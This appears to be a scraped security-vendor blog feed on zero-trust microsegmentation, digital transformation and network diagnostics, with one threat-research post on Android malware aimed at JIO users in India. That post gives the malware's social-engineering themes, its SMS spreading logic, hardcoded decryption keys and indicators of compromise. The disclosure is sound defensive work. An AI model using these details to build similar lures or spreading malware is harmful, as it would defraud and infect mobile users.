of the main problems with traditional microsegmentation projects is translating application speak (how applications function and communicate) into network speak (how networks send/receive data) so that security controls (based on network constructs) function. This is no small task; in today’s cloud and container environments, address-based information is unreliable as a security control since development teams can spin up or spin down an application or service in a matter of hours, changing the source data (e.g., IP address, port, or protocol) for the control decision IP address spoofing Furthermore, address spoofing is a relatively trivial task for even a moderately skilled script kiddie. Attackers can hide in approved network traffic and the security team would be none the wiser. Piggybacking on an approved IP addresses using approved protocols, attackers can move laterally across segments or subnets to their ultimate targets (generally data or applications) and remain undetected. Application dependencies and policy compression In today’s app-centric networks (whether on-premises or in the cloud), application dependencies are highly complex. Traditional microsegmentation requires security teams to understand access control lists, routing rules, and firewall rules. Changes to any one of these things could break functionality on a business-critical application and cause a major disruption that the security team now has to defend. As a result, to facilitate microsegmentation, many security organizations end up building thousands of policies, but doing so renders management of these policies unwieldy. To reduce the number of policies, security teams need to remove the fine-grained controls that make proper segmentation worthwhile. A new kind of microsegmentation Whatever microsegmentation is or isn’t, preventing lateral movement and malware propagation on the network is critical to protecting organizations from cyber criminals. Security teams need manageable ways to create secure zones within their networks, gain visibility into data flows, and place fine-grained controls around data-rich applications and workflows. And they need a way to do it that delivers a return on their investment (ROI) from both a time and cost standpoint. Even if traditional microsegmentation were the most effective security control in the security professional’s toolbox (it’s not), the barriers to entry are just too high for anyone but the largest, best-resourced organizations. What is zero trust microsegmentation? Zero trust microsegmentation is a method of applying application-level security controls that enforce the strictest least-privileged authentication and authorization for applications and services communicating in the hybrid cloud. How is this different from traditional, network microsegmentation? Microsegmentation typically refers to segmentation based on network constructs — IP addresses, ports, and protocols. In other words, security controls are based on the environment as opposed to the applications or services attackers are trying to exploit. With Zscaler, security is abstracted away from the network environment. It doesn’t matter where your apps and services are running because the environment isn’t the issue. The data is. What are identity attributes? To alleviate the problem of compromised apps and services and malware propagation, Zscaler creates security policies that are tied to the cryptographic identity of the apps and services communicating on your networks. With Zscaler, the cryptographic identity (“fingerprint”) comprises 30 attributes, such as the SHA256 hash, UUID of the BIOS, file name, file path, product name, and version number, etc. The data source for the fingerprint is what the software is rather than where it’s coming from or going to. This fingerprint results in policies that travel with the workload and won’t break if the environment changes. Software-based identity is the key to ensuring your workloads are malware resistant. Another factor in the efficacy of Zscaler zero trust microsegmentation is our unique value proposition: A system of symmetrical validation of communications. No application, service, or host is allowed to send or receive communication unless it is positively verified by its fingerprint — every time it tries to communicate, and on both ends of the connection. Collectively, Zscaler’s software-defined application-level control coupled with least-privileged access and required symmetrical verification means that communications in your data center or cloud are fully protected against lateral movement and malware propagation. Simplification at its best As stated, above, traditional microsegmentation is highly complex and unwieldy. Zero trust microsegmentation with Zscaler is simple; all policy recommendations are automatically generated based on the identity of your communicating software and can be applied (or removed) in one click. Users do not need to understand network traffic flows, and subnets do not need to be manually created. The fingerprints of your applications determine permissions, not network constructs. Finally, all application paths are mapped and exposed automatically, which means that you always have full view into your application topology and can easily report point-in-time risk. It doesn’t get much simpler than that. Additional resources: Blog: How Microsegmentation Differs from Network Segmentation Blog: Microsegmentation is Foundational to Cloud Security: Don't Get Spoofed Datasheet: One-Click Zero Trust for Automated Microsegmentation (PDF) Thu, 08 Apr 2021 08:00:02 -0700 Nagraj Seshadri A Novel Concept: Enabling Companies To Do What They’re Supposed To Do. This post also appeared on LinkedIn. As an F500-company leader and former management consultant, I’ve spent much of my IT professional career adapting enterprise infrastructure to meet “digital transformation” challenges. I’ve come to question the term “digital transformation.” As a term of art, it isn’t particularly specific. It can mean different things to different people: Is digital transformation a change in security architecture? The adoption of SaaS applications? Moving infrastructure to the cloud? Enabling work from anywhere (WFA)? Converting an internally managed WAN to a Software-Defined WAN (SD-WAN)? Does it include customer engagement or user experience? For me, digital transformation can be any significant change to legacy architecture designed to improve the core competencies of supported business. In practice, “digital transformation” encompasses cloud migration, security transformation, cultural evolution, and — most importantly — IT’s transformation into an engine of business growth. It’s that last piece — IT’s transformation into a business-growth enablement engine — that represents the ultimate objective of digital transformation. For example, my previous company provided employment services to companies and applicants looking to connect, globally. We were not an IT software or hardware company, yet our top-notch IT team had to make a network run, build email servers, and develop the occasional CRM application. But we found that the attention paid to legacy infrastructure wasn’t the best use of IT resources. We achieved more — much more — when IT focused on how to leverage partners and services to achieve the goals of our company and customers. This became all the more apparent as the company grew both organically and through mergers and acquisitions (M&A). Digital transformation objective #1: Keep your head in the clouds “Digital transformation” typically involves the cloud. But what is a cloud-first solution? Is it moving assets to the cloud? Is it using the cloud as part of your infrastructure? Is it enabling working from anywhere? It’s all of those things, and more. The cloud element of digital transformation strategy is about decentralizing infrastructure and operations so that an enterprise can quickly adapt to take advantage of new technology to better realize goals. Cloud services can supplant the need for costly custom development, but only with perspective:Every discipline of IT should be challenged to answer the question, “Why are we building this service instead of buying and delivering it to the business instead?” Digital transformation should enable core competencies. But building and managing services limits core competencies by contributing to technology debt that limits future growth potential. Digital transformation objective #2: Secure the work without slowing performance Security concerns can complicate cloud adoption. Security teams must protect legacy networks in an environment of ongoing attacks, new exploits, data-exfiltration threats, evolving business models, systems integration (often from M&A activity). The apparent control that legacy security models provide is attractive: Forcing data to flow through managed, centralized gates seems to provide oversight of access and traffic. Except that control is illusory, not to mention a performance bottleneck. The majority of employee work is now performed outside the purview of perimeter-based security visibility. The enterprise world has embraced a decentralized, cloud-first model of work, whether IT teams welcome it or not. When those IT teams try to secure cloud-first work with legacy infrastructure, performance falters, and users look to alternatives. Some bypass security for the sake of faster connectivity. Others create so-called “shadow-IT” initiatives. This centralized security model adds little value to an enterprise. For example, IT teams need visibility into data traffic flows, application use, even data-center access. Legacy network infrastructure can slow data traffic by routing it to a faraway destination, but it can’t provide any of that needed visibility. Legacy stacks of heterogeneous, point-product networking and security equipment provides no consolidated way of determining this information quickly. (Try pulling a specific IP address and port from firewall access lists that are several years old.) So how do you begin “transforming” your network? Start with security. Move it to the cloud. Whether you recognize it or not, legacy security is holding you back. When you decouple security from centralized, hub-and-spoke network architectures, it opens the entire network to change. Now you can build decentralized infrastructure that securely employs the internet as its delivery device. The Zero Trust Network Access (ZTNA) architecture is built upon fundamentals of zero trust, specifically, a default-deny security posture that minimizes trust issuance, automatically rejecting system access to unknown sources, both inside and outside the network. This architecture is typically distributed via a cloud service. To gain access to a ZTNA environment, users must meet specific requirements. ZTNA offers true control: organizations can dictate, customize, and adjust access requirements based on specific needs and risk level. These requirements can be set at user, device, location, and application levels. Shifting to cloud-based security opens the enterprise system extensibility floodgates: Your network can now use cloud-based Wi-Fi controllers, phone systems, video-conferencing systems, collaboration platforms like Microsoft Teams, industry-specific SaaS, etc. The “black-box” legacy network mindset holds back progress: Legacy security costs too much, is difficult to administer, provides little in the way of flexibility, and worst of all, isn’t even that secure. Digital transformation to the cloud means that IT becomes the enterprise enabler of change, and a strategic partner in business process improvement. Digital transformation objective #3: Set the transformation stage within corporate culture Digital transformation requires both a corporate mandate and a cultural shift. Change can be hard: Many IT teams have a deeply ingrained attachment to centralized security infrastructure models. It’s what they know. It’s what they’re certified on. Many view cloud-first architectures with understandable apprehension. Meanwhile, CxOs listen to them, and don’t always have the technical perspective to choose one security paradigm over another. Successful enterprise digital transformation requires patient teaching and committed assurance: Educate leadership. CxOs need to understand what “cloud-first” means from a business perspective, not a technical one. When it comes to company leadership, position cloud-first as the means to achieve company goals and solve company issues. Case in point, the COVID-19 crisis. Legacy networks were for the most part unequipped to rapidly handle the needed changes to workforce models. Companies with flexible, cloud-first networks shifted quickly and with little disruption to productivity and budget. Assure IT. IT teams are on the hook for making company technology work. And you’re asking them to manage during a period of (what seems to them dramatic) change. They prefer the known to the unknown. To make digital transformation work, you’re going to have to convince them to move beyond their comfort zone. I worked for a company that pushed through a consolidation of infrastructure. The biggest roadblock was the culture within IT. IT stakeholders were used to supporting point products that they had spent their entire career managing. They had a very confined view of what was possible. IT leaders needed to understand that their new role was helping the company consume services and deliver capabilities to their business, as opposed to building and managing them at a much lower infrastructure level. These leaders also needed to ensure that team members understood their role in the new “consuming services” model (vs. their role when building services). When IT becomes the business engine Once your IT team and executive teams are on board with moving away from legacy architectures, you can start building the cloud-first enterprise. You can start making IT a way of driving new enterprise objectives. It’s a myth that you must sacrifice security for user experience. Once educated teams embrace the cloud, your teams can help generate revenue, protect data, reduce costs, or avoid unnecessary spend. Beyond that, now you can reassess all the delayed projects that have piled up on the service managers because they cost too much, couldn’t be done securely, or required unavailable resources. Instead of the department that says “no,” you can be the department that says “yes.” Wed, 07 Apr 2021 10:12:41 -0700 Dan Shelton Android apps targeting JIO users in India Introduction In March 2021, through Zscaler cloud we identified a few download requests for malicious Android applications which were hosted on sites crafted by the threat actor to social engineer users in India. This threat actor leverages latest events and news related to India as a social engineering theme in order to lure users to download and install these malicious Android apps. We identified several GitHub accounts which are hosting malicious Android mobile apps (APK files) and web pages which are used actively in this campaign. One of the Android apps masquerades as a TikTok App. In 2020, the TikTok app was banned by the government of India. Attackers are leveraging that theme to lure the users by misinforming them that TikTok is available in India again. Another instance we observed recently involved the threat actor leveraging a “Free Lenovo Laptop” scheme by Indian government. In this blog, we will describe the complete infection chain, and the timeline of this threat actor highlighting how they have changed the theme over a period of time to distribute the malicious Android apps. Timeline Per our research, this threat actor has been active in-the-wild since as early as March 2020. We observed a pattern in their tactics, techniques and procedures (TTPs). They leverage popular themes and current events in India and use them as a social engineering technique to lure the user to download their application. The graphical timeline below shows the different themes used by the threat actor over a period of time. Figure 1: Timeline showing different themes used by threat actor Attack flow Attack infection chain begins with an SMS or a Whatsapp message where the user receives a shortened URL link which ultimately redirects to a website hosted on Weebly and controlled by the attacker. The content of this site is crafted based on current events in India and used for social engineering. Figure 2: Attack flow In the original download request which we observed in Zscaler cloud, the user-agent string was: WhatsApp/ which indicated to us that the link was clicked by the user in a WhatsApp message. As an example, in one of the instances, the shortened URL redirected the user to the website: https://tiktokplus[.] which looks like shown in Figure 3. Shortened link: http://tiny[.]cc/Tiktok_pro URL: https://tiktokplus[.] GitHub download link: Figure 3 This webpage misinforms the user that the TikTok application is available again in India and lures them to download it. The actual APK file is hosted on an attacker-controlled GitHub account. GitHub account name: breakingnewsIndia GitHub download link: During our research on this threat actor, we also identified several more GitHub accounts and the complete list is available in the Indicators of Compromise (IOC) section. Figure 4 and Figure 5 shows two more such GitHub accounts. Figure 4 Fivegcovert (5G Covert) Figure 5 The latest theme used by this threat actor is related to “Free Lenovo laptop scheme by Indian Government”. Shortened URL: hxxps://tiny[.]cc/Register-Laptop Final URL: hxxps://govlapp[.] MD5 hash of APK file: f9e5fac6a4873f0d74ae37b246692a40 Package name: com.jijaei.pikapinjan Figure 6 shows the website crafted by the attacker and hosted on which misinforms the user and lures them to download the APK file. Figure 6 Technical analysis For the purpose of technical analysis we will look at the APK file with MD5 hash: 5e0ac8784dae349cfa840cbef5bd3dfb Package name: heartrate.tracker.cameras Mainactivity: heartrate.tracker.cameras.MainActivity Important code sections included below. // MainActivity MainActivity does nothing more than simply calling the datalaile.class // datalaile.class The datalaile.class performs the following operations: Checks if required permissions are granted. If permissions are not granted, request them and if the user denies the permissions shows a Popup message mentioning “Need Permission to start app!!” and again asks the user for permissions Starts the malicious service from “felavo.class” when permissions are granted Displays a form for Username and Password input Performs validation on the entered Username and do further operations Figure 7: Getting permissions and starting malicious service Username Validation Although the Username is expected to be in the form of a mobile number as per the error message but there is no explicit check for that. It only checks if the Username length is at least 4 characters else displays a message asking the user to enter the correct number. Figure 8: Username validation If the check passes it shows a Popup message to start TikTok which when clicked calls the sendmsg.class // sendmsg.class The sendmsg.class prompts the user to share the app 10 times on WhatsApp. There is no check to identify if WhatsApp is installed or not. In case WhatsApp is not installed a Toast message is shown “WhatsApp not Installed” but the counter still decrements. The shared message has the following content: “*Tiktok is back in India*\n\n*Enjoy Tiktok Videos again and also*\n*make Creative videos again with*\n*new Features.*\n\n*Tiktok is now Partner with Jio.*\n\n*NOTE : All users can use their old Id.*\n\n*Now Tiktok is only available on*\n*TiktokPro android app.*\n\n*Link:*” As we can see, the above message contains a shortened URL which lures the user into downloading this malicious app. Figure 9 shows the code flow for sharing the app on WhatsApp Figure 9: Sharing app on WhatsApp Figure 10 shows the interface displayed by the app which prompts the user to share it with their contacts through WhatsApp 10 times. Figure 10: Message shown to user to prompt sharing with contacts through WhatsApp After the app is shared 10 times on WhatsApp, the user is displayed a congratulation message with a Continue button which when clicked calls the clickendra.class // clickendra.class The clickendra.class asks the user to perform a few more steps to get started with the app, then displays some Ads to the user and finally shows a message that Tiktok will start in 1-HOUR. Figure 11 below shows the final message displayed to the user Figure 11: 1-HOUR app start message displayed to the user Display Ads These apps are used by the threat actor to generate revenue by displaying interstitial advertisements to the user. There are two software development kits (SDKs) used for this purpose. If it fails to retrieve advertisements using one SDK, then it uses the next SDK as a failover mechanism. Below two SDKs were used in the app. AppLovin StartApp At first, the AppLovin SDK is initialized and context is set. In order to leverage AppLovin SDK to display advertisements, a developer needs to use the SDK key obtained from AppLovin interface. In the case of this app, we can find the SDK key configured in AndroidManifest.xml as shown in Figure 12. Figure 12: AppLovin SDK key configured in AndroidManifest.xml file Before displaying the Ads a fake view is created for the user which contains a fake text message and a fake progress bar on top of all the elements. After setting the fake view, a request to fetch the Ads is sent. If the Ad is received successfully, then it is displayed and the fake progress bar is hidden, else a request to load the next Ad is sent. If the next Ad load request also fails, then the StartApp SDK is initialized to load the Ads. If startApp SDK is also unable to receive the Ad, then the “lastactivity.class” is called. Figure 13 below shows the Ad displayed to the user Figure 13: Ad displayed to the user // lastactivity.class It changes the content view, initializes the StartApp SDK again and creates a fake progress bar as earlier. If the Ad is received, then it is displayed to the user, else the message shown in Figure 11 above is displayed and no further activity is done. // Inside the service felavo.class The main objective of the code implemented for the service is to spread the malware to more users. The service felavo.class performs the following operations: Initialization The decoy message used to spread the application is stored in encrypted form. In the initialization phase the service configures the cryptographic context which is later used to decrypt the decoy message. Note: In some cases it is just the left over code which executes but the decrypted decoy message is never used. Instead a hard coded message is already configured in the function where the decrypted decoy message is supposed to be used. Among all the analysed samples we found two cryptographic algorithms in use: 1. AES/CBC/NoPadding 128-bit Key: 9876543210wsxzaq 2. DESede Key: ThisIsSpartaThisIsSparta SMS-based spreading The spreading operation performed by the service is through SMS. Currently the malware targets only JIO customer base. Before sending the SMS to any number in the infected device’s contact list, the malware confirms that the operator is JIO. Methods of identification are explained under the Contacts Operator Identification section. SIM Identification SIM identification is done to determine the SIM slot to be used later for sending the SMS. To identify the SIM card following operations are performed: If Android SDK version >= 22 and READ_PHONE_STATE permission is granted, then fetch Sim slot number and Carrier name else fetch the operator names corresponding to the SIM cards on the current device. Checks if fetched information contains - JIO, AIRTEL, IDEA, VODAFONE or VI If any of the above string is present then check and return the SIM slot number else return the value “default” Figure 14: Fetching SIM information Figure 15: Matching operator string Contacts Operator Identification As stated earlier, the targeted user base for the attacker is JIO users. The contact numbers in the user’s contact list are identified to be JIO users in two steps: Note: Before identification, all the contacts are fetched, sanitized, processed as per specified format and then saved in a list. Step-1: There is a hardcoded list of the first 4 digits of mobile numbers that are specific to JIO. All the retrieved contacts are checked using this list and a separate list of identified contacts is created. Figure 16 below shows the code which uses the mobile number as an input and checks the first 4 digits. Figure 16: Checks first 4 digits of the mobile number Step-2: The numbers which are not identified in the first step are identified again by sending a network request to the URL “”, configured with all the required parameters. Identified contacts are again stored in a separate list. Figure 17 below shows the network request sent with required parameters and checks performed on response data Figure 17: Sending network request and checking response If the response code is success then it perform two checks: If the response data contains “NOT_SUBSCRIBED_USER” then the mobile number doesn’t belong to a JIO user If the response data contains the mobile number being identified then it is a registered JIO user Sending SMS Identify SIM slot to send the SMS based on the value of the second parameter which is the value obtained from the SIM identification section. Figure 18 below shows the code snippet responsible for sending SMS Figure 18: Sending SMS Zscaler cloud sandbox report Figure 19 shows the Zscaler Cloud Sandbox successfully detecting this Android mobile-based threat. Figure 19: Zscaler cloud sandbox report Summary of TTPs We can summarise the tactics, techniques and procedures (TTPs) as follows. They use URL shortening service to create shortened URLs which are sent in messages in the spreading stage. Web pages are hosted on on an attacker-controlled account. The actual APK file is hosted on a GitHub account which is registered by the attacker. Names of these accounts are chosen to look relevant to India or themes popular in India. The AES / DES decryption keys in the code are re-used by the threat actor. Users of JIO mobile service provider in India are specifically targeted. Conclusion This threat actor stays up-to-date with the latest events in India and leverages them for social engineering. Users must exercise caution before downloading and installing Android applications from untrusted and third party sources, even if these links are received from mutual contacts on their Android device. Also, as seen in this attack, the malicious download links are sent through user's existing contact list. Apps such as TikTok must only be downloaded from official sources. The Zscaler ThreatLabZ team will continue to monitor this campaign, as well as others, to help keep our customers safe. MITRE ATT&CK table ID Tactic Technique T1406 Obfuscated Files or Information Strings inside the app are encrypted using AES or DES T1432 Access Contact List Filters JIO contacts from user’s contact list T1475 Deliver Malicious App via Other Means Delivers app via WhatsApp or SMS spam T1444 Masquerade as Legitimate Application Apps created uses legit themes T1582 SMS Control Send SMS in the background Indicators of Compromise MD5 hashes // Laptop Theme f9e5fac6a4873f0d74ae37b246692a40 b9db0c60100099d860b9ef42e6b3903a f1187f4d6135264e5002fcfdf43643e9 // PUBG Theme ba4011653e604dd4dab34da5e71cbdb4 220f70660921b76e06da148bc2ace554 // Cricket Theme 68a4a08947524ce9da09017fc4309149 998b3d9f0e895d20be8668ac86958fd9 36dc28525e1e84a94d57b6050903ec4b // Corona Theme 2cd7e237cbf99e483573c11a11db9223 // TikTok Theme Note: This is the truncated MD5 list 5bf513f7fd5186eaa1be8fab370bd510 6a69e2810a361c4e58433cbf7d9d6a5a 73dc187df641640e541727b151a1112c f6cb20a637717c13633940c5f3f1a06e e3afb7ce2763b52f3a192f4278b12932 4cde87788d35305aa4973cca79b41e51 0d7e6b85961b0d517e68f9f6e33b557f a07f658338aa7c0aa4f26dfe985d5ef6 595e51779d7dbd760f8a82f3b8041594 d14719a50b6e66e53100605529ece5d8 0b6643d94e40318c9aefbc0d5f1fc3b4 5157a53a086473b4c28f3c6d04ff6702 d871d8d9b934e83e2dc1391a905e2871 41aa8fbe680eab948123fe3a7d7d20ee a6c3b1184b467a5ecc484940c7a5898e 622a8f4f9f892dc65454ff15343f56d9 b6180d14e8a3e3abb7161fd379e2b3e4 f960fb6a092b9c681e7699af9825ffd1 d0d8743c7c1edb42a3036f013bb73f4f d6fb317d9914c72664d3a4f343e41a7f 2105a7d8bc46ff14a1a3be5de5d2fb2e // JIO theme a1a3d79b29884326a8d6df8eb3468758 b392d35e2eff810193398a8b1148d7c6 2867450cc6c0bc491fcd9ded1f5e928e 3476bed0f34113bd53f08f1b78d157e9 381b0e3e9635c0582a085c3f66aa73b1 Few unique package names com.jijaei.pikapinjan heartrate.tracker.cameras com.jadhalno.goplotu vaccine.india.cororegister Few distribution URLs hxxp://tiny[.]cc/Tiktok_pro hxxps://bharatnewsin[.] hxxps://tiny[.]cc/Register-Laptop hxxps://govlapp[.] Github usernames samakaka123 Newindiannews Breakingindianews Hotstarvip Tiktoksproaccount Tiktokprousers Indiantik Tiktokproaccount Tiktokprov2 Ind-bucket Kikalalo753 Quotamangem Tiktosjij Tiktoind D869 Tiktopro Go-laps-register Mytiktokv1 Tiktokprousers References Thu, 08 Apr 2021 08:15:24 -0700 Sahil Antil Diagnosing Network Performance Problems in the Work-from-Anywhere Enterprise Whether IT likes it or not, home networks and local internet service providers (ISP) are now part of the corporate network infrastructure. IT teams must monitor and diagnose performance issues that involve an employee’s home network. The new reality requires IT to shed traditional assumptions that people are in the office and apps are in the data center and use an updated methodology to troubleshoot performance problems. Digital experiencing monitoring (DEM) solutions meet these new challenges. DEM tools leverage a combination of synthetic transaction monitoring, network path monitoring, and endpoint device monitoring to measure, triage, and diagnose issues from the end-user’s perspective. DEM tools shed light on the home network so that desktop, network, and security teams can use the following steps to diagnose performance issues: Step 1: Objectively measure digital experience Step 2: Rule out the application Step 3: Examine the endpoint device and the network: Wi-Fi issues Home gateway problem Local ISP connection review Zscaler Digital Experience helps pinpoint network issues Zscaler, the leading cloud security vendor, has recently introduced its own DEM solution called Zscaler Digital Experience (ZDX), integrated with its Zero Trust Exchange cloud security platform. The last year has changed how people work, sending most employees outside the traditional corporate perimeter. IT teams are now responsible for maintaining user experience for diverse home network connections—much of which isn’t under their direct control. Enterprises must have visibility into all the traffic connecting to all the assets in their distributed network. DEM solutions fill in the visibility gaps that traditional monitoring tools overlook and allow for both network teams and security teams to leverage the same data to optimize end-user experience—no matter where those users sit. This allows IT teams to detect complex home network issues by measuring true digital experience, rule out application issues, and determine if the issues lie on the end-user device or somewhere on the network path between the user and the application host. Diagnostic drilldown #1: How to measure true digital experience...objectively. When a user complains about poor performance outside the office, IT must objectively verify the claim. Leveraging synthetic transactions from the end-user device is an effective method. Using a synthetic GET to the application’s URL, IT teams can see and measure page load times on the device browser. Constant user-monitoring enables the IT team to establish the necessary baseline performance measurements for comparison when users report issues. Let’s use ZDX to analyze one performance scenario. Figure 1: Spikes shown for page load time measurements for a critical externally-facing application Let’s drill down into this page load time data. The page-load time measurements in Figure 1 indicates that the user’s application experience degraded dramatically over several hours and resulted in several outages (noted by red circles). Diagnostic drilldown #2: Rule out the application. Page-load time has clearly degraded. And that warrants the next investigative step: determining if the application is to blame for performance issues. We start by measuring application server response time (SRT) to see how long it takes the server to respond to a browser’s initial GET command. Figure 2: This data correlates the server response time and page load time. With some caveats, a high correlation between increases in the page load time and the SRT (as seen in Figure 2 above) indicates that the application might be causing performance issues. It’s essential, however, to verify that the end-to-end network latency has remained stable during this time. Figure 3: This Network latency data over time shows stable performance. Network latency appears to have been relatively stable during this period of slower page load times. That, coupled with the SRT correlation, offers further evidence pointing to the application itself as the user-experience-impacting culprit. Diagnostics drilldown #3: Examine the endpoint device and the network. User experience problems can be triggered at an endpoint, so let’s take a closer look at Wi-Fi and client-device performance. Wi-Fi issues The health of the user’s home Wi-Fi network can contribute to performance issues. Use the page load time metrics to find when the user performance degraded. Check if end-to-end network latency also rose at the same time. If the rise in page load time times and network latency occur together, something in the user device’s path is causing the performance issue. Check if a severe drop in the user Wi-Fi access point (AP) signal strength or bandwidth correlates with the high page load time and high latency. If so, the user’s WiFi signal strength is likely the culprit. A simple resolution might be moving closer to the AP, but other issues could be at play: Signal interference or an improperly configured home network. Figure 4: Data showing a correlation between app performance and Wi-Fi signal strength and bandwidth Windows and MacOS both provide a “Network Bandwidth” metric that shows estimated wireless bandwidth values for each NIC. This metric can identify fluctuations in available bandwidth, which may be caused by weak signal strength, interference, etc. Figure 5: Data showing fluctuations in network bandwidth metrics. Home gateway problem Not all home networks are created equal: If performance degradation causes aren’t apparent in the application or user device, check the user’s home gateway. Older home gateways with outdated firmware are a common source of performance problems. The figure below shows activity for a user’s device “gateway_mac_address”. This is the advertised MAC address of the gateway interface. The user’s MAC address changes often, and a “NA” response correlates with page load time spikes and connection losses. Figure 6: Intermittent slowness/outages is affecting all applications. Figure 7: Data examining gateway interface flapping for MAC addresses. This indicates an unstable interface issue on the home gateway. In this case, an investigation revealed a known issue for the firmware version running on the gateway. A firmware upgrade fixed the problem. Local ISP connection review After ruling out the application and user device, it’s time to analyze the network connection. The hops between the end-user device and the application include the home network, local ISP connection, internet backbone connection, and (in some cases) a forward proxy connection. If the local ISP network connection is the source of the performance problem, it’s important to isolate which hop causes the problem. Outbound path traces collected from the end-user machine combined with path traces collected from a forward proxy provides critical details (an available option for existing Zscaler customers). In the example below, page load time degradation correlates with network latency issues (peaking at over 500ms). A hop-by-hop analysis shows that most latency came from the ISP last-mile connection (a common source of excessive delay during the pandemic due to uneven or unstable local internet provider services). This same analysis could have shown latency on any internet backbone hop, forward proxy hop, etc. Figure 8: Page load times showing application performance drop. Figure 9: Network latency spikes in the last mile A digital experience monitoring (DEM) tool provides real-time user experience monitoring that helps identify issues that contribute to outages, downtime, or disruptions to the user experience. A DEM helps proactively detect and resolve end-user connectivity issues. A DEM: Gathers device performance data to analyze end-user resources and events such as CPU, memory usage, and Wi-Fi connectivity issues that impact end-user experiences. Measures cloud path performance to analyze end-to-end and hop-by-hop network path metrics from every user device to the cloud application. Monitors application performance to measure application metrics such as response time, DNS resolution, etc. By keeping track of end-user metrics and statistics, enterprises can proactively prevent remote employee downtime and ensure productivity for users no matter where they sit. Zscaler, a leading SASE network security vendor, has recently introduced its own DEM solution called Zscaler Digital Experience (ZDX), closely tied to its cloud security platform. Find out more information on Zscaler’s website. Thu, 01 Apr 2021 14:39:55 -0700 Sanjit Ganguli Full Cloud Ahead: A Journey to Zenith Live 2021 When I joined Zscaler last fall, the company was in the final few days before launching its first all-virtual Zenith Live Cloud Summit. It was an enormous undertaking, and dozens of people had worked for months to make it a dynamic experience, in spite of its being virtual, with compelling speakers and material that attendees would find truly useful. I pretty much arrived at Zscaler just in time to turn on my monitor, enter the virtual conference hall, and tune in. In session after session, I learned so much about the company, the market, and, above all, the realities that Zscaler customers are contending with in the real world, along with their vast community of enterprise CIOs, CISOs, and IT professionals at all levels. There was something else we all learned last fall: with nearly 14,000 people registered for Zenith Live, it was clear that there’s an ongoing thirst for information. That’s why I’m so excited to announce that we will be hosting an all-new virtual Zenith Live this June. This event will be focused on using zero trust as the foundation for accelerating secure business transformation and fueling your company’s growth at cloud speed. AMERICAS | June 15–16 EUROPE | June 16–17 ASIA-PACIFIC | June 22–23 Since our very first conference in Las Vegas, Zenith Live has always been dedicated to secure transformation and, though we’ll miss meeting everyone in person, this year’s event will be no different. But for most organizations, transformation is well underway. With the widespread use of SaaS and the migration of private apps to public clouds, more business traffic is destined for the cloud than the data center. And starting in 2020, with the remote workforce going from the exception to the rule, most user traffic is being routed over the internet, not the corporate LAN or WAN. As this transformation has accelerated, organizations have begun to realize the promise of the cloud, achieving greater resiliency and flexibility, unprecedented productivity and collaboration, and better customer outcomes. But companies that continue to rely on legacy networking and security solutions are holding up progress, hindering their IT leadership teams’ ability to speed innovation, create new revenue streams, and drive the business forward. We believe that transformation is a business imperative, and its benefits can’t wait, so for Zenith Live 2021, the theme is Full Cloud Ahead. What does it mean to go full cloud ahead? It means leaving behind the technologies of the past that are making you vulnerable to attack and that frustrate users with poor performance and dropped connections. It means simplifying your infrastructure and taking advantage of powerful business enablers, such as big data, artificial intelligence, IoT and OT, and machine learning. And for most, it also means greater efficiency and reduced costs. The key to going full cloud ahead is to build on a true zero trust strategy that secures every connection using business policies. At Zenith Live, we’ll be presenting recent innovations in our Zero Trust Exchange platform that will accelerate your transformation with expanded capabilities and greater automation. At Zenith Live, you’ll hear how leading organizations are enabling zero trust right now to achieve their business goals. Learn about trends and innovations during keynotes, panel discussions, and fireside chats with industry leaders. Choose from more than 50 technical sessions and bring real solutions to your organization through architecture workshops and expert-led training. I’m looking forward to being a part of all of it and I hope you will, too. Be sure to register today so you can receive updates on the agenda and notifications when registration for training opens. Tue, 06 Apr 2021 08:00:01 -0700 Chris Kozup Microsegmentation 101 Microsegmentation can be a very effective cybersecurity strategy, helping to stop lateral threat movement, thereby minimizing the blast radius and damage caused by a cybersecurity incident. Despite its huge potential, several key challenges have kept microsegmentation from wider adoption. Why do we need microsegmentation? Most high-profile attacks and security incidents involve an initial infiltration via a vulnerable system or person, followed by lateral movement across the organization’s network. It is this lateral movement that typically allows attackers to escalate the amount of damage they can do. The attacker might initially infiltrate or compromise an application that is not considered mission-critical and, therefore, hasn’t been patched, only to use that system as a jumping-off point to other systems that do contain sensitive information. Or, the initial system might be the first infected machine from which a strain of ransomware starts to make its way across the network to other machines. On an open, flat network with very few internal controls, this type of thing happens all too often. The unfortunate truth is that most efforts have been focused on creating a strong perimeter defense, leaving internal controls and defenses lacking. With the porous nature of today’s enterprise perimeter and the persistence of bad actors, most perimeter defenses will eventually be defeated. Internal controls built on microsegmentation can minimize the damage that an attacker can cause once they get in. How microsegmentation works Microsegmentation works by dividing large, open groups of applications or workloads into small segments based on the communication requirements of each application. Applications will then be permitted to communicate within their segment, but cannot make unauthorized communications to applications outside of their segment. Microsegmentation is a core component of a zero trust security model for workloads in the cloud and data center. In short, microsegmentation picks up where perimeter security ends, enforcing policy throughout the organization’s internal network, not just at the perimeter. For example, a customer resource management (CRM) web application would be permitted to communicate with the database that stores the corresponding customer data, but the system coordinating physical building operations and security would not be able to connect to that same database. Microsegmentation is most often applied at either the host level or the network level. Host-based microsegmentation Host-based microsegmentation relies on agents installed on endpoint devices. The advantage of using an agent is that it provides much more granular control and visibility, and offers a path towards easier-to-manage identity-based microsegmentation. By using an agent, you can segment based on dynamic, human-understandable policies rather than on static network-level rules. For example, an identity-based policy might state that a certain Python script,, can communicate on the network, but the more nefarious that is running on the same VM cannot. Such granularity of control and an easy-to-understand policy model is impossible with the network-based model. The downside of host-based microsegmentation is that not all workloads can have an agent installed on them. This may include legacy operating systems, serverless and PaaS functions, etc. For these types of services, most agent-based platforms will typically include either embeddable agent code and/or fall back to network-based segmentation for out-of-scope systems. There are two primary types of host-based microsegmentation. One orchestrates host-based firewalls and the other type leverages identity-based control. Host firewall-based microsegmentation involves a more dynamic version of a traditional network firewall but with similar limitations. Because all firewalls are blind to the true identity of communicating workloads and rely on network address-based controls, they can be circumvented by attackers that exploit the "trust in the network.” Workload-identity-based protection, on the other hand, allows only cryptographically verified applications to communicate over approved network paths. Every attempted communication is validated, ensuring that bad actors and malicious software have no ability to communicate on the network. Network-based microsegmentation Network-based microsegmentation is exactly like it sounds—segmentation performed at the network level by modifying access control lists (ACLs) or firewall rules. Because it is performed at the network layer, there is no agent to deploy onto workloads. There are several major downsides to network-based microsegmentation. First, it can only enforce policies per endpoint. This means that if there is a legitimate piece of software on the same endpoint as a malicious piece of software, the firewalls typically used as enforcement devices cannot distinguish between the two of them. Both pieces of software will either be blocked or allowed. Additionally, because these policies are based on network port and IP address, they are static by definition. In today’s cloud-centric environments, 